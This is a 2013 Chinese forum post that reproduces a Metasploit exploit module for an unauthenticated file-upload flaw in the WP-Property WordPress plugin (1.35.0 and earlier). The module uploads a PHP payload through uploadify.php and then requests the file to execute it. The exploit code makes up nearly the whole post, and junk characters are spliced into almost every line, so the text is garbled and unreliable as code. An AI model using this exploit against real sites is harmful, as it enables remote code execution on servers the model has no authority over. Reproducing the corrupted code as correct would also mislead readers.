WordPress WP-Property PHP 文件上传漏洞
- o7 z8 F w/ S" S# _6 x5 ?" y- o
## # This file is part of the Metasploit Framework and may be subject to$ c: t! K/ m) i; B/ j* c
3 B* A8 I6 S# t" `9 t) \
# redistribution and commercial restrictions. Please see the Metasploit
# N# B3 g8 W! K/ L. n
& V9 a$ a+ i x( e1 @3 p# J# Framework web site for more information on licensing and terms of use.
. R: m9 ?' w% q, Q, Z: D2 ?7 m+ C* Z+ u+ `
# http://metasploit.com/framework/ ##6 \* L O }9 k
7 r. r T1 D ? 8 E7 k6 p$ {. k' |
7 {( Q+ w1 ?! j& k5 L3 K
$ V$ G* R. ?5 W9 o2 r9 U+ b4 M! e5 y- `
$ L/ e5 c% w" E d; S7 V9 k6 b+ zrequire 'msf/core'
/ ]9 k- Z0 Y. j' xrequire 'msf/core/exploit/php_exe'
3 M# l1 i/ q: H/ ]+ o/ @' i8 F
/ x; v" D& }' q6 \1 c: ]4 Kclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
# k4 U9 _% J; a'Description' => %q{* ?. _, j7 p# F1 K
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>) R9 @ F9 [# o# O
[$ U5 h' }8 R# t$ K( T$ G
'Sammy FORGIT', # initial discovery
' S: Q d3 z& z/ @. w T) F'James Fitts <fitts.james[at]gmail.com>' # metasploit module
3 C/ l8 Z4 E% M+ g/ | v% s4 a! ]],* _" B. S/ X7 s8 `1 d4 F; l
'License' => MSF_LICENSE,
# F5 z% f" j8 Z0 A7 @$ X'References' =>8 L& v, i: H# v
[7 B0 N& t0 W* ~) q5 A R
[ 'OSVDB', '82656' ],4 A7 _ i" ~1 x! g$ I) Q, e1 {6 c/ w
[ 'BID', '53787' ],
$ U' P2 Q* O: S[ 'EDB', '18987'],
" u, s1 C Y! p9 i5 s5 l* k! s[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
- }: L4 w! S; a I. {],( @ D8 g/ \6 }5 d
'Payload' =>/ E5 @- ?) c% H
{
, L1 l, P# ~! a$ K0 f'BadChars' => "\x00",
" h. a' q) U! K$ T3 T},
& g) G) a( k$ d'Platform' => 'php',
( A1 {- b% h: f. c! l8 Z5 |6 N'Arch' => ARCH_PHP," L7 J! M5 V' g) u3 H6 `
'Targets' =>
2 O/ B; i; k }( |: R2 O[
& C! B5 }3 S0 U0 `0 L$ x6 J[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],# P6 M s' K0 L" F% G+ k
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], f7 E2 a# M( i
],
7 A8 f- ~; G1 J4 n/ y& D; n0 `'DefaultTarget' => 0,* i/ Z# o1 ` g( A! X! ]$ H5 o
'DisclosureDate' => 'Mar 26 2012')): F1 n* ?' G! \5 g
/ a; L: ^9 q9 _! u" t; j4 t
register_options(
) g/ P: _3 W$ K; ?, e[
! l9 I, u) s( v6 q# wOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
" b1 f' t* j8 ^+ j8 G n], self.class). @$ a, N; P0 M
end
6 c6 U& V% f; B6 X$ k; D
9 U; x# q8 v' v: T- o+ A7 q' ]def check/ c& e( B- E, p k: c
uri = target_uri.path
" U) x P% F% C7 Muri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',0 q" V* h" @1 m& i( g# U
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"2 ~7 I1 H: ]3 Z/ t2 p# D
})9 b3 i* B. b- |1 H8 W! u9 E0 ^
. A: v0 V- t. }, t, ]- A! h# W3 N9 \
if not res or res.code != 200
* r! E4 J# U1 M& ?return Exploit::CheckCode::Unknown# |9 l! ]( p& N
end+ u g! w6 K2 F3 F; O+ [
$ {9 p7 a( S$ a( h9 q% Rreturn Exploit::CheckCode::Appears
9 l: K/ _- [- F F, v9 Y% S1 c, v0 K: Kend
1 u u, V" \$ ?4 ^( U! K' ~( M& F% k- m' I+ e
def exploit
0 H* l8 O2 L4 f2 X k% k+ j6 suri = target_uri.path* Z5 N3 n8 X9 E% [9 m5 L2 E
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
# \* U; u" T/ ?2 Q7 c% Z6 P% t H, f' { q7 X) M. k* D
data = Rex::MIME::Message.new
8 ~2 A7 k) X4 Q$ E5 |* ddata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
) P5 S" R% U; m5 ?: ?data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
# a/ }4 ~, a- X1 Cpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')6 P- O, L8 ?$ ^, C/ }7 v
. d6 a& i, ?5 M. h. uprint_status("#{peer} - Uploading payload #{@payload_name}")# U) }1 V7 |% C8 k& `/ `( u1 X
res = send_request_cgi({6 j* x2 T" |0 k1 t7 a$ ?
'method' => 'POST',
' I' {8 y% q# X& E* n2 ^'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
0 m2 `1 A+ e3 y- U5 d3 N'ctype' => "multipart/form-data; boundary=#{data.bound}",
9 } o4 L2 G1 g1 S( n" q'data' => post_data
7 ? o5 R3 u Q6 R, _% K2 e}). W( ]! e0 r( k( K
% G; q1 H6 ]8 L+ y# ^
if not res or res.code != 200 or res.body !~ /#{@payload_name}/2 |; y) A9 G, j3 l# V' a3 B. X
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
7 e. R. d6 S! G Aend( K6 f j$ @8 e
; t U% q1 n3 L
upload_uri = res.body( T+ g; ?6 ^7 K( W
8 m0 V$ t( J% K- ] A, D/ s
print_status("#{peer} - Executing payload #{@payload_name}")0 K+ [( u6 t- V2 q& `3 O
res = send_request_raw({
9 z2 ~8 v# p7 w1 u: G N'uri' => upload_uri,6 G/ C o9 p: P7 ]
'method' => 'GET'
1 V) R/ Q4 a, q" }# n) W})
! r7 p o0 `% B: oend5 m7 ` P; k, V; d) K
end, G7 A: R7 }) i8 |% L
# q: n) O' y: Y# ^
不要问我这写的是什么 怎么利用 我是说msf.
' H2 S' B) e! _3 @9 y5 A. a8 R, l7 l2 T: B0 s
|
发表于 2013-1-4 19:51:30
收藏
支持
反对